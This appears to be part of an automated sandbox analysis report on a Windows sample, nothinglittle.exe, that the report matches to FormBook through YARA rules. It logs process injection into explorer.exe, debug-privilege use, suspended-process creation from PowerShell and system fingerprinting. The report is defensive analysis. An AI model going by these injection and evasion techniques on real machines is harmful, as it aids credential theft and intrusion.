Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012AF86D mov eax, dword ptr fs:[00000030h] 28_2_012AF86D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01341843 mov eax, dword ptr fs:[00000030h] 28_2_01341843
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012928AE mov eax, dword ptr fs:[00000030h] 28_2_012928AE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012928AE mov eax, dword ptr fs:[00000030h] 28_2_012928AE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012928AE mov eax, dword ptr fs:[00000030h] 28_2_012928AE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012928AE mov ecx, dword ptr fs:[00000030h] 28_2_012928AE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012928AE mov eax, dword ptr fs:[00000030h] 28_2_012928AE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012928AE mov eax, dword ptr fs:[00000030h] 28_2_012928AE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h] 28_2_012B78A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h] 28_2_012B78A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h] 28_2_012B78A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h] 28_2_012B78A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h] 28_2_012B78A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h] 28_2_012B78A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h] 28_2_012B78A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h] 28_2_012B78A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h] 28_2_012B78A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01283880 mov eax, dword ptr fs:[00000030h] 28_2_01283880
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01283880 mov eax, dword ptr fs:[00000030h] 28_2_01283880
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01303884 mov eax, dword ptr fs:[00000030h] 28_2_01303884
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01303884 mov eax, dword ptr fs:[00000030h] 28_2_01303884
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Thread register set: target process: 3388 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\Documents\nothinglittle.exe C:\Users\Public\Documents\nothinglittle.exe Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process created: C:\Users\user\AppData\Local\Temp\nothinglittle.exe C:\Users\user\AppData\Local\Temp\nothinglittle.exe Jump to behavior
Source: explorer.exe, 0000001D.00000000.438472962.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
Source: explorer.exe, 0000001D.00000000.439042458.0000000001980000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001D.00000000.439042458.0000000001980000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000001D.00000000.439042458.0000000001980000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Queries volume information: C:\Users\Public\Documents\nothinglittle.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs